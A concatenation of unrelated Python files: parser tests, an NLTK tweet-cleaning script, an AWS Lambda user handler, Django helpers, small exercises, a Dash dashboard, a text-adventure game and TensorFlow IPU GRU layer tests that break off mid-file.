mock_tika_from_file.assert_called_once_with(source_location)
def test_extract_age(self):
# Arrange
lines = ["Sheet 1"
, "Page 1"
, "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "Age"
, "Sheet 2"
, "Page 2"
, "5"]
source_location = ""
destination_location = ""
age = [5]
length_of_features = 1
age_index = 4
parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
ret_val = parser.extract_age(length_of_features, age_index, lines)
assert ret_val == age
assert len(ret_val) == 1
test_data = [(["Sheet 1"
, "Page 1"
, "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "Age"
, "Sheet 2"
, "Page 2"
, "5"], 4)
,
(["Sheet 1"
, "Page 1"
, "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "Age"
, "Sheet 2"
, "Page 2"
, "5"], 5)
,
(
["Sheet 1"
, "Page 1"
, "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "Sheet 2"
, "Page 2"
, "5"], -1
)
]
@pytest.mark.parametrize("lines, expected_value", test_data)
def test_get_index_of_age_variable(self, lines, expected_value):
# Arrange
source_location = ""
destination_location = ""
parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
# Act
ret_val = parser.get_index_of_age_variable(lines)
# Assert
assert ret_val == expected_value
test_data_vals = [(["F", "1.1512", "1.175", "0.4125", "24.123", "12.123", "5", "6"],
("F", 1.1512, 1.175, 0.4125, 24.123, 12.123, 5, 6, False)),
(["F", "Gooood", "1.175", "0.4125", "24.123", "12.123", "5", "6"],
("F", np.nan, 1.175, 0.4125, 24.123, 12.123, 5, 6, True)),
(["F", "1.1512", "Gooood", "0.4125", "24.123", "12.123", "5", "6"],
("F", 1.1512, np.nan, 0.4125, 24.123, 12.123, 5, 6, True))
]
@pytest.mark.parametrize("vals, expected_value", test_data_vals)
def test_get_converted_row(self, vals, expected_value):
# Arrange
source_location = ""
destination_location = ""
parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
# Act
ret_val = parser.get_converted_row(vals)
# Assert
assert ret_val == expected_value
|
import pandas as pd
import nltk
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk import pos_tag
import re
import string
# I am adding my own stopwords list to the NLTK list.
# This way we can drop words that are irrelevant for text processing
MY_STOPWORDS = ['singapore','vaccine']
STOPLIST = set(stopwords.words('english') + list(MY_STOPWORDS))
SYMBOLS = " ".join(string.punctuation).split(" ") + ["-", "...", "”", "``", ",", ".", ":", "''","#","@"]
# The NLTK lemmatizer and stemmer classes
lemmatizer = WordNetLemmatizer()
stemmer = SnowballStemmer('english')
# read english selected tweets, no duplicates
scrapedData = pd.read_csv('demo.csv')
list = [x for x in range(0,len(scrapedData.columns))]
scrapedData.columns = list
# I use the POS tagging from NLTK to retain only adjectives, verbs, adverbs
# and nouns as a base for for lemmatization.
def get_lemmas(tweet):
# A dictionary to help convert Treebank tags to WordNet
treebank2wordnet = {'NN':'n', 'JJ':'a', 'VB':'v', 'RB':'r'}
postag = ''
lemmas_list = []
for word, tag in pos_tag(word_tokenize(tweet)):
if tag.startswith("JJ") or tag.startswith("RB") or tag.startswith("VB") or tag.startswith("NN"):
try:
postag = treebank2wordnet[tag[:2]]
except:
postag = 'n'
lemmas_list.append(lemmatizer.lemmatize(word.lower(), postag))
return lemmas_list
# We will now pre-process the tweets, following a pipeline of tokenization,
# filtering, case normalization and lemma extraction.
# This is the function to clean and filter the tokens in each tweet
def clean_tweet(tokens):
filtered = []
for token in tokens:
if re.search('[a-zA-Z]', token):
if token not in STOPLIST:
if token[0] not in SYMBOLS:
if not token.startswith('http'):
if '/' not in token:
if '-' not in token:
filtered.append(token)
return filtered
# Prior to lemmatization, I apply POS (part-of-speech) tagging to make sure that only the
# adjectives, verbs, adverbs and nouns are retained.
# Starts the lemmatization process
def get_lemmatized(tweet):
all_tokens_string = ''
filtered = []
tokens = []
# lemmatize
tokens = [token for token in get_lemmas(tweet)]
# filter
filtered = clean_tweet(tokens)
# join everything into a single string
all_tokens_string = ' '.join(filtered)
return all_tokens_string
edited = ''
#for i, row in scrapedData.iterrows():
#edited = get_lemmatized(scrapedData.loc[i]['text'])
#if len(edited) > 0:
#scrapedData.at[i,'edited'] = edited
#else:
#scrapedData.at[i,'edited'] = None
# After lemmatization, some tweets may end up with the same words
# Let's make sure that we have no duplicates
scrapedData.drop_duplicates(subset=['edited'], inplace=True)
scrapedData.dropna(subset=['edited'], inplace=True)
# Using apply/lambda to create a new column with the number of words in each tweet
scrapedData['word_count'] = scrapedData.apply(lambda x: len(x['text'].split()),axis=1)
t = pd.DataFrame(scrapedData['word_count'].describe()).T
print(t)
scrapedData.to_csv('test.csv') |
import json
import boto3
from boto3.dynamodb.conditions import Key
personalize_events = boto3.client(service_name='personalize-events')
sqs = boto3.resource('sqs')
responseQueue = sqs.get_queue_by_name(QueueName="chat_service_queue")
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('DynamoDBTableUsersName')
def add_user_to_personalize(user):
user_properties = {}
if 'AGE' in user:
user_properties['AGE'] = user['AGE']
if 'GENDER' in user:
user_properties['GENDER'] = user['GENDER']
personalize_events.put_users(
datasetArn='arn:aws:personalize:eu-central-1:043035977035:dataset/user-songs-group/USERS',
users=[{
'userId': user['USER_ID'],
'properties': json.dumps(user_properties)
}]
)
def lambda_handler(event, context):
data = json.loads(event['Records'][0]['body'])
query_result = table.query(KeyConditionExpression=Key('USER_ID').eq(data['user']['id']))
if query_result['Count'] == 0:
user = {"USER_ID": f"{data['user']['id']}"}
else:
user = query_result['Items'][0]
command_type = data['data']['options'][0]['name']
message = "Nothing done."
if command_type == 'delete':
if query_result['Count'] == 0:
message = "You cannot delete your account, because it does not exist..."
else:
table.delete_item(Key={'USER_ID': data['user']['id']})
message = "Your account has been deleted..."
elif command_type == 'set':
if data['data']['options'][0] == {"name": "set", "type": 1}:
if query_result['Count'] == 0:
table.put_item(Item=user)
add_user_to_personalize(user)
message = "Account created without details!"
else:
message = "Nothing to update."
else:
for opt in data['data']['options'][0]['options']:
user[opt['name'].upper()] = f"{opt['value']}"
table.put_item(Item=user)
add_user_to_personalize(user)
if query_result['Count'] == 0:
message = "Account created with details!"
else:
message = "Details updated!"
response_event = {
"appId": data['appId'],
"message": message,
"user": data['user'],
"token": data['token']
}
return responseQueue.send_message(MessageBody=json.dumps(response_event))
|
#fail
import sys
length = int(sys.stdin.readline())
graph = []
for _ in range(length):
graph.append(list(map(int, sys.stdin.readline().rstrip())))
count = [0 for _ in range(length + 1)]
def check_possible(i, j, n):
if i + n > length or j + n > length:
return False
for a in range(i, i + n):
for b in range(j, j + n):
if graph[a][b] == 1:
continue
else:
return False
return True
def check_box(n):
count = 0
for i in range(length):
for j in range(length):
if check_possible(i, j, n):
count += 1
return count
for i in range(1, length + 1):
count[i] = check_box(i)
print("total: " + str(sum(count)))
for number in range(1, len(count) + 1):
if count[number] == 0:
break
print("size[" + str(number) + "]: " + str(count[number]))
|
from django.contrib.staticfiles.utils import get_files
from django.contrib.staticfiles.storage import StaticFilesStorage
from alfa import helper,crypto
import xml.dom.minidom
from X import settings
import os
import json
from django.core.exceptions import ObjectDoesNotExist
from .models import details
import requests
def xmlfiles(mylocation="xml"):
s = StaticFilesStorage()
xmls=list(get_files(s, location=mylocation))
xmlfiles=[(os.path.join(settings.STATIC_ROOT,filename)) for filename in xmls]
return xmlfiles
def dbinsert(mydict):
myinst=details()
myinst.title = mydict['title']
myinst.image = mydict['image']
myinst.url = mydict['Url']
myinst.tag = mydict['tag']
myinst.videotype = mydict['videoType']
try:
myinst.save()
return True
except:
return False
def dbdelete():
try:
details.objects.all().delete()
return True
except:
return False
def GetAllCategories():
categories=details.objects.values('tag')
return categories
def pagination_logic(page_number):
baseurl="http://localhost:8000/list/?page={0}".format(page_number)
response=requests.get(baseurl)
serialdata=json.loads(response.text)
try:
nextpage="?"+serialdata['next'].split("?")[-1]
except:
nextpage="#"
try:
previewpage="?"+serialdata['previous'].split("?")[-1]
if "page" not in previewpage:
previewpage="?page=1"
except:
previewpage="#"
data=serialdata['results']
for d in data:
Myurl=d["url"]
encurl=crypto.encrypt(Myurl)
d["url"]=encurl
context={
"nextpage" : nextpage,
"previewpage" : previewpage,
"data" : data,
}
return context |
class Number:
def sum(self):
return self.a + self.b
num = Number()
num.a = 500
num.b = 1000
sum = num.a + num.b
print(sum) |
# 基于format方法进行各种指定
print('{:5d}'.format(1234567))
print('{:7d}'.format(1234567))
print('{:9d}'.format(1234567))
print('{:,}'.format(1234567))
print()
print('{:b}'.format(1234567))
print('{0:o} {0:#o}'.format(1234567))
print('{0:x} {0:#X}'.format(1234567))
print()
print('{:%}'.format(35 / 100))
print()
print('{:e}'.format(3.14))
print('{:f}'.format(3.14))
print('{:g}'.format(3.14))
print()
print('{:.7f}'.format(3.14))
print('{:12f}'.format(3.14))
print('{:12.7f}'.format(3.14))
print()
print('{:.0f}'.format(3.0))
print('{:#.0f}'.format(3.0)) |
#!/usr/bin/env python
import roslib; roslib.load_manifest('pplan')
import os, os.path
import numpy as np
from matplotlib import pyplot as plt
import ppas
run_dir = os.getcwd()
data_dir = os.path.join(run_dir, 'data')
s = ppas.Store(data_dir)
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.graph_objs as go
from graphs import score_by_game_dur, win_by_behind_ball_diff, \
win_by_defensive_half, score_by_on_ground, score_by_slow_speed
external_stylesheets = ['https://unpkg.com/material-components-web@latest/dist/material-components-web.min.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div(children=[
html.H1(children='Rocket League Analysis'),
# html.Div(children='''
# Dash: A web application framework for Python.
# '''),
dcc.Tabs(id="tabs", children=[
dcc.Tab(label='Score by Game Duration', children=[
score_by_game_dur
]),
dcc.Tab(label='Outcome by Difference of Time Spent Behind Ball', children=[
win_by_behind_ball_diff
]),
dcc.Tab(label='Score by Time Spent in Own Defensive Half', children=[
win_by_defensive_half
]),
dcc.Tab(label='Score by Time Spent on The Ground', children=[
score_by_on_ground
]),
dcc.Tab(label='Score by Time Spent Traveling at a Slow Speed', children=[
score_by_slow_speed
])
])
])
if __name__ == '__main__':
app.run_server(debug=True) |
import game
from textwrap import dedent
from random import randint
class Stage():
def __init__(self):
self.game = game.Game()
# game module has methods for combat and handling user input
def enter(self):
pass
class Castle_wall(Stage):
def __init__(self):
super(Castle_wall, self).__init__()
def enter(self, health):
print(dedent("""
You approach the castle wall, it is approximately 80ft high.
There is a gate to your right. There appear to be some climbing holds in the wall, and you also have a grappling hook.
"""))
c = self.game.choice(['gate right walk','climb holds','grappling'])
if 'grappling' in c:
print("A guard hears the grappling hook land and cuts the rope while you are climbing.")
return 'dth', 0, False
elif 'climb' in c:
print("You find good holds and make your way up the wall quickly.")
return 'crt', health, False
elif 'walk' in c:
print("You walk through the gate and are immediately confronted by a guard.")
health = self.game.combat(health)
if health:
print(f"You defeat the guard in combat, you have {health} health")
return 'crt', health, False
else:
print("The gaurd defeated you in combat")
return 'dth', health, False
class Death(Stage):
def __init__(self):
super(Death, self).__init__()
def enter(self, health):
print("You have died.")
return '', 0, True
class Courtyard(Stage):
def __init__(self):
super(Courtyard, self).__init__()
def enter(self, health):
print(dedent("""
You step out into the courtyard, you have to cross to get to the towers on the other side.
There are a lot of people walking around, you may be able to hide in plain sight.
There are some trees on the other side of the courtyard that make a lot of shadows, or you could walk through the castle corridors.
"""))
c = self.game.choice(['plain sight hide', 'shadow tree trees other', 'castle corridor'])
if 'sight' in c:
print("You are quickly confronted by several guards")
return 'dth', health, False
elif 'tree' in c:
print("You through the shady trees to the tower without being noticed.")
return 'twr', health, False
else:
print("In the corridor there is a guard blocking your path 20 yards away")
health = self.game.combat(health, 'range')
if health:
print("You defeat the guard and continue down the corridor.")
return 'twr', health, False
else:
print("The guard has defeated you.")
return 'dth', health, False
class Tower(Stage):
def __init__(self):
super(Tower, self).__init__()
def enter(self, health, second_attempt = False):
if second_attempt:
print("You walk back out to the room with three doors.")
else:
print("You enter a room with three doors.")
print(dedent("""
There is a door with a metal coin, a door with the royal seal, and an unmarked door.
Which do you choose?
"""))
c = self.game.choice(['coin first','royal seal second','unmarked blank third third'],'\n> ')
if 'coin' in c:
print("You open the door and the room is filled with guards.")
return 'dth', health, False
elif 'royal' in c:
print("You open the door, the room is royal clerk room. There is one guard inside.")
health = self.game.combat(health)
if health:
print("You defeat the guard.")
return 'twr', health, False, True
else:
print("The guard has defeated you.")
return 'dth', health, False
else:
print("You open the door and there is a staircase that leads down.")
c = self.game.choice(['back other door','down stair continue'],"Do you try another door or continue down the stairs?\n")
if 'back' in c:
return 'twr', health, False, True
else:
print("You continue down the stairs")
return 'vlt', health, False, False
class Vault(Stage):
def __init__(self):
super(Vault, self).__init__()
def enter(self, health):
print("You see the vault ahead, there is a gaurd but he is facing the other way.")
health = self.game.combat(health, 'quiet')
if health:
print("You have defeated the guard.")
return 'lck', health, False
else:
print("The guard has defeated you.")
return 'dth', health, False
class Lock(Stage):
def __init__(self):
super(Lock, self).__init__()
def enter(self, health):
print(dedent("""
There is a lock on the vault, a combination of three numbers 1 - 3.
Example '123'
There is only enough time for 10 attempts before the guards realize you are here.
"""))
a, b, c = randint(1,3), randint(1,3), randint(1,3)
combination = str(a) + str(b) + str(c)
attempts = 0
guess = ''
while combination != guess and attempts < 10:
guess = input("Enter a combination\n> ")
attempts += 1
if attempts == 10:
print("That is 10 attempts, you are discovered by the guards.")
return 'dth', health, False
else:
print("Correct guess. The door opens and you take the piece of treasure.")
return 'trs', health, False
class Treasure(Stage):
def __init__(self):
super(Treasure, self).__init__()
def enter(self, health):
print(dedent("""
Now you have to escape the castle.
You can continue deeper into the vault, or return through the courtyard.
"""))
c = self.game.choice(['deeper continue vault', 'back up courtyard'])
if 'back' in c:
print("You return through the courtyard and are quickly captured by guards.")
return 'dth', health, False
else:
print("You continue deeper into the vault and find a door that leads outside the castle.")
return '', health, True
class Play():
def __init__(self, starting_stage, difficulty = 'medium'):
self.starting_stage = starting_stage
self.difficulty = difficulty
self.health = 20
stages = {
'cw' : Castle_wall(),
'dth' : Death(),
'crt' : Courtyard(),
'twr' : Tower(),
'vlt' : Vault(),
'lck' : Lock(),
'trs' : Treasure()
}
def restart(self):
i = input("Would you like to play again?\nYes/no> ")
if 'y' in i.lower():
self.start()
else:
print("Thank you for playing.")
def cont(self, stage, second_attempt = False):
# starts the next scene
s = self.stages[stage]
if second_attempt:
output = list(s.enter(self.health, second_attempt))
else:
output = list(s.enter(self.health))
try:
nx, health, end, second_attempt = tuple(output)
except:
nx, health, end = tuple(output)
if end:
self.restart()
else:
self.health = health
self.cont(nx, second_attempt)
def start(self):
if self.difficulty == 'easy':
self.health = 30
elif self.difficulty == 'hard':
self.health = 15
elif self.difficulty == 'expert':
self.health = 5
else:
self.health = 20
s = self.starting_stage()
nx, health, end = s.enter(self.health)
if end:
self.restart()
else:
self.health = health
self.cont(nx)
p = Play(Castle_wall)
p.start() |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the GRU cell and layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import numpy as np
from absl.testing import parameterized
import pva
# pylint: disable=unused-import
from tensorflow.compiler.tests import xla_test
from tensorflow.compiler.plugin.poplar.ops import gen_popnn_ops
from tensorflow.python.platform import googletest
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ipu.config import IPUConfig
from tensorflow.python.ipu import utils
from tensorflow.python.ipu import test_utils as tu
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import gradient_descent
from tensorflow.keras.layers import GRU
# pylint: enable=unused-import
DATA_TYPE = np.float32
BATCH_SIZE = 1
SEQ_LEN = 3
INPUT_SIZE = 5
NUM_CHANNELS = 8
def _totalTileMemory(report):
return sum(tile.memory.total.excludingGaps
for tile in report.compilation.tiles)
class AUGRUCell(rnn_cell.RNNCell):
def __init__(self, num_units, kernel_init, recurrent_init, bias_init):
super().__init__()
self._num_units = num_units
self.kernel_init = kernel_init
self.recurrent_init = recurrent_init
self.bias_init = bias_init
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
# Unpack inputs and attention scores
x = inputs[:, :-1]
a = inputs[:, -1]
# Get weights
n = self._num_units
h = state
input_dim = x.shape[1]
with variable_scope.variable_scope("",
use_resource=True,
reuse=variable_scope.AUTO_REUSE):
kernel = _get_variable('kernel', [input_dim, n * 3], self.kernel_init)
rec_kernel = _get_variable('recurrent_kernel', [n, n * 3],
self.recurrent_init)
bias = _get_variable('bias', [n * 3], self.bias_init)
# Reset gate
rx = math_ops.matmul(x, kernel[:, :n])
rh = math_ops.matmul(h, rec_kernel[:, :n])
r = math_ops.sigmoid(rx + rh + bias[:n])
# Update gate
zx = math_ops.matmul(x, kernel[:, n:n * 2])
zh = math_ops.matmul(h, rec_kernel[:, n:n * 2])
z = math_ops.sigmoid(zx + zh + bias[n:n * 2])
# Candidate state
cx = math_ops.matmul(x, kernel[:, n * 2:])
ch = math_ops.matmul(r * h, rec_kernel[:, n * 2:])
c = math_ops.tanh(cx + ch + bias[n * 2:])
# Attention score influences the mixing of the old + candidate states.
# This is the only difference between the GRU and AUGRU cells.
z = z * (1 - a)
# Mix old state and candidate state
h = z * h + (1 - z) * c
return h, h
def _get_variable(name, shape, initializer):
return variable_scope.get_variable(name,
shape=shape,
initializer=initializer,
dtype=DATA_TYPE)
def _createGRUInput(value, shape):
return np.full(fill_value=value, shape=shape, dtype=DATA_TYPE)
def _createGRUInitialState(value, shape):
return np.full(fill_value=value, shape=shape, dtype=DATA_TYPE)
class GRUTest(xla_test.XLATestCase, parameterized.TestCase): # pylint: disable=abstract-method
def _GRULayerCPU(
self,
inputs,
weights_value,
seq_length,
seq_val,
initial_state,
att_scores,
training,
name,
input_size=INPUT_SIZE, # pylint: disable=unused-argument
num_channels=NUM_CHANNELS,
activation='tanh',
recurrent_activation='sigmoid'):
del name
with ops.device("/device:CPU:0"):
kernel_init = init_ops.constant_initializer(weights_value, DATA_TYPE)
recurrent_init = init_ops.constant_initializer(weights_value, DATA_TYPE)
bias_init = init_ops.constant_initializer(0.0, DATA_TYPE)
if att_scores is None:
gru = GRU(num_channels,
activation=activation,
recurrent_activation=recurrent_activation,
kernel_initializer=kernel_init,
recurrent_initializer=recurrent_init,
bias_initializer=bias_init,
time_major=True,
return_sequences=True,
stateful=True,
reset_after=False)
outputs = gru(inputs, initial_state=initial_state, training=training)
else:
# There is no native AUGRU implementation
inputs = array_ops.concat(
[inputs, array_ops.expand_dims(att_scores, -1)], axis=2)
outputs, _ = rnn.dynamic_rnn(AUGRUCell(num_channels, kernel_init,
recurrent_init, bias_init),
inputs=inputs,
sequence_length=seq_length,
initial_state=initial_state,
dtype=DATA_TYPE,
scope="augru",
time_major=True)
outputs = outputs if seq_val is None else outputs[0:min(
SEQ_LEN, seq_val[0])]
return outputs
def _GRULayer(self,
inputs,
weights_value,
seq_length,
seq_val,
initial_state,
att_scores,
training,
name,
activation='tanh',
recurrent_activation='sigmoid',
input_size=INPUT_SIZE,
num_channels=NUM_CHANNELS,
options=None,
options_bwd=None):
with ops.device("/device:IPU:0"):
with variable_scope.variable_scope("gru_layer", use_resource=True):
kernel = _get_variable(
"kernel",
shape=[input_size + num_channels, 3 * num_channels],
initializer=init_ops.constant_initializer(weights_value,
DATA_TYPE))
biases = _get_variable("biases",
shape=[3, num_channels],
initializer=init_ops.constant_initializer(
0.0, DATA_TYPE))
options = {} if options is None else options
options_bwd = {} if options is None else options_bwd
if seq_length is None:
outputs, _ = gen_popnn_ops.popnn_gru_layer(
activation=activation,
recurrent_activation=recurrent_activation,
inputs=inputs,
num_channels=num_channels,
kernel=kernel,
biases=biases,
initial_state=initial_state,
is_training=training,
name=name,
options=json.dumps(options),
options_bwd=json.dumps(options_bwd))
elif att_scores is not None:
outputs, _ = gen_popnn_ops.popnn_augru_layer(
activation=activation,
recurrent_activation=recurrent_activation,
inputs=inputs,
num_channels=num_channels,
kernel=kernel,
biases=biases,
initial_state=initial_state,
is_training=training,
seq_len=seq_length,
att_score=att_scores,
name=name,
options=json.dumps(options),
options_bwd=json.dumps(options_bwd))
else:
outputs, _ = gen_popnn_ops.popnn_dynamic_gru_layer(
activation=activation,
recurrent_activation=recurrent_activation,
inputs=inputs,
num_channels=num_channels,
kernel=kernel,
biases=biases,
initial_state=initial_state,
is_training=training,
seq_len=seq_length,
name=name,
options=json.dumps(options),
options_bwd=json.dumps(options_bwd))
outputs = outputs if seq_val is None else outputs[0:min(
SEQ_LEN, seq_val[0])]
return outputs
def _RunGRULayerInference(self, name, input_value, weights_value, seq_val,
init_state_value, att_score_val,
gru_layer_function):
with self.session() as sess:
pinputs = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
name="inputs")
pinitial_state = array_ops.placeholder(DATA_TYPE,
[BATCH_SIZE, NUM_CHANNELS],
name="initial_state")
pseq_len = array_ops.placeholder(
np.int32, [BATCH_SIZE],
name="seq_len") if seq_val is not None else None
patt_scores = array_ops.placeholder(
DATA_TYPE, [SEQ_LEN, BATCH_SIZE],
name="att_score") if att_score_val is not None else None
gru_output_seq = gru_layer_function(inputs=pinputs,
weights_value=weights_value,
seq_length=pseq_len,
att_scores=patt_scores,
seq_val=seq_val,
initial_state=pinitial_state,
training=False,
name=name)
inputs = _createGRUInput(input_value, pinputs.shape)
initial_state = _createGRUInitialState(init_state_value,
pinitial_state.shape)
fd = {pinputs: inputs, pinitial_state: initial_state}
if pseq_len is not None:
fd[pseq_len] = seq_val
if patt_scores is not None:
fd[patt_scores] = np.full(patt_scores.shape, att_score_val, DATA_TYPE)
sess.run(variables.global_variables_initializer())
return sess.run(gru_output_seq, fd)
def _RunInferenceComparison(self,
name,
input_value,
weights_value,
init_state_value,
seq_val=None,
att_score_val=None):
ops.reset_default_graph()
popnn_out = self._RunGRULayerInference(name=name,
input_value=input_value,
weights_value=weights_value,
seq_val=seq_val,
att_score_val=att_score_val,
init_state_value=init_state_value,
gru_layer_function=self._GRULayer)
ref_out = self._RunGRULayerInference(name=name,
input_value=input_value,
weights_value=weights_value,
seq_val=seq_val,
att_score_val=att_score_val,
init_state_value=init_state_value,
gru_layer_function=self._GRULayerCPU)
# Check that the whole output sequence matches
self.assertAllClose(popnn_out, ref_out)
def testGRULayerInference(self):
cfg = IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
np.random.seed(0)
# Run with attention scores (augru):
for init_state_value in [0., 1.]:
self._RunInferenceComparison('augru',
input_value=0.01,
weights_value=0.1,
init_state_value=init_state_value,
seq_val=[1],
att_score_val=0.5)
# Run with all-0 weights
for init_state_value in [0., 1.]:
self._RunInferenceComparison('ones',
input_value=0.,
weights_value=0.,
init_state_value=init_state_value)
# Run with all-1 weights
for init_state_value in [0., 1.]:
self._RunInferenceComparison('ones',
input_value=0.,
weights_value=1.,
init_state_value=init_state_value)
# Run with random weights
for weight in np.random.rand(3):
for init_state_value in [0., 1.]:
self._RunInferenceComparison('rand',
input_value=0.,
weights_value=weight,
init_state_value=init_state_value)
# Run with '1'' seq_len
assert BATCH_SIZE == 1
for init_state_value in [0., 1.]:
self._RunInferenceComparison('ones',
input_value=0.,
weights_value=0.,
init_state_value=init_state_value,
seq_val=[1])
# Run with zero seq_len
for init_state_value in [0., 1.]:
self._RunInferenceComparison('ones',
input_value=0.,
weights_value=0.,
init_state_value=init_state_value,
seq_val=[0])
def _RunGRULayerTraining(self,
name,
input_value,
weights_value,
seq_val,
init_state_value,
training_steps,
labels_array,
att_score_val,
gru_layer_function,
device_string,
batch_size=BATCH_SIZE,
input_size=INPUT_SIZE,
num_channels=NUM_CHANNELS,
options=None,
options_bwd=None):
with self.session() as sess:
pinputs = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, batch_size, input_size],
name="inputs")
plabels = array_ops.placeholder(np.int32, [batch_size], name="labels")
pseq_len = array_ops.placeholder(
np.int32, [batch_size],
name="seq_len") if seq_val is not None else None
patt_scores = array_ops.placeholder(
DATA_TYPE, [SEQ_LEN, batch_size],
name="att_score") if att_score_val is not None else None
with ops.device(device_string):
with variable_scope.variable_scope("gru_layer", use_resource=True):
initial_state = _get_variable(
"initial_state",
shape=[batch_size, num_channels],
initializer=init_ops.constant_initializer(
init_state_value, DATA_TYPE))
kwargs = {}
if options is not None:
kwargs["options"] = options
if options_bwd is not None:
kwargs["options_bwd"] = options_bwd
logits = gru_layer_function(inputs=pinputs,
weights_value=weights_value,
seq_length=pseq_len,
seq_val=seq_val,
initial_state=initial_state,
att_scores=patt_scores,
training=True,
name=name,
input_size=input_size,
num_channels=num_channels,
**kwargs)
logits = math_ops.reduce_mean(logits, axis=0)
softmax = nn.sparse_softmax_cross_entropy_with_logits_v2(
logits=logits, labels=array_ops.stop_gradient(plabels))
loss = math_ops.reduce_mean(softmax)
train = gradient_descent.GradientDescentOptimizer(0.01).minimize(loss)
utils.move_variable_initialization_to_cpu()
sess.run(variables.global_variables_initializer())
losses = []
inputs = _createGRUInput(input_value, pinputs.shape)
fd = {
pinputs: inputs,
plabels: labels_array,
}
if seq_val is not None:
fd[pseq_len] = seq_val
if patt_scores is not None:
fd[patt_scores] = np.full(patt_scores.shape, att_score_val, DATA_TYPE)
for _ in range(0, training_steps):
l, _ = sess.run([loss, train], fd)
losses.append(l)
return losses
def _RunTrainingComparison(self,
name,
input_value,
weights_value,
init_state_value,
training_steps,
seq_val=None,
att_score_val=None):
labels_array = np.ones(shape=[BATCH_SIZE], dtype=np.int32)
ops.reset_default_graph()
popnn_losses = self._RunGRULayerTraining(name=name,
input_value=input_value,
weights_value=weights_value,
seq_val=seq_val,
init_state_value=init_state_value,
att_score_val=att_score_val,
training_steps=training_steps,
labels_array=labels_array,
gru_layer_function=self._GRULayer,
device_string="/device:IPU:0")
ops.reset_default_graph()
ref_losses = self._RunGRULayerTraining(
name=name,
input_value=input_value,
weights_value=weights_value,
seq_val=seq_val,
init_state_value=init_state_value,
att_score_val=att_score_val,
training_steps=training_steps,
labels_array=labels_array,
gru_layer_function=self._GRULayerCPU,
device_string="/device:CPU:0")
self.assertAllClose(popnn_losses, ref_losses)
def testGRULayerTraining(self):
cfg = IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
np.random.seed(42)
# Run with random weights
for weight in np.random.rand(3):
for init_state_value in [0., 1.]:
self._RunTrainingComparison('rand',
input_value=0.,
weights_value=weight,
init_state_value=init_state_value,
training_steps=3)
# Run with a sequence length
assert BATCH_SIZE == 1
for weight in np.random.rand(3):
for init_state_value in [0., 1.]:
self._RunTrainingComparison('rand',
input_value=0.,
weights_value=weight,
init_state_value=init_state_value,
training_steps=3,
seq_val=[1])
# Run with attention scores
for weight in np.random.rand(3):
for init_state_value in [0., 1.]:
self._RunTrainingComparison('augru',
input_value=0.,
weights_value=weight,
init_state_value=init_state_value,
training_steps=3,
seq_val=[1],
att_score_val=0.5)
def testGRUActivations(self):
input_value = 0.7
weights_value = 0.3
init_state_value = 1.
seq_val = None
inputs = _createGRUInput(input_value, [SEQ_LEN, BATCH_SIZE, INPUT_SIZE])
initial_state = _createGRUInitialState(init_state_value,
[BATCH_SIZE, NUM_CHANNELS])
def run(gru_layer_function, act, rec_act):
ops.reset_default_graph()
with self.session() as sess:
pinputs = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
name="inputs")
pinitial_state = array_ops.placeholder(DATA_TYPE,
[BATCH_SIZE, NUM_CHANNELS],
name="initial_state")
pseq_len = array_ops.placeholder(
np.int32, [BATCH_SIZE],
name="seq_len") if seq_val is not None else None
gru_output_seq = gru_layer_function(inputs=pinputs,
weights_value=weights_value,
seq_length=pseq_len,
seq_val=seq_val,
att_scores=None,
initial_state=pinitial_state,
training=False,
name=None,
activation=act,
recurrent_activation=rec_act)
fd = {pinputs: inputs, pinitial_state: initial_state}
if pseq_len is not None:
fd[pseq_len] = seq_val
sess.run(variables.global_variables_initializer())
return sess.run(gru_output_seq, fd)
for activation in ['tanh', 'relu', 'softmax', 'sigmoid', 'hard_sigmoid']:
for recurrent_activation in ['softmax', 'sigmoid', 'hard_sigmoid']:
output_cpu = run(self._GRULayerCPU, activation, recurrent_activation)
output_ipu = run(self._GRULayer, activation, recurrent_activation)
self.assertAllClose(output_cpu, output_ipu)
def testGRUCached(self):
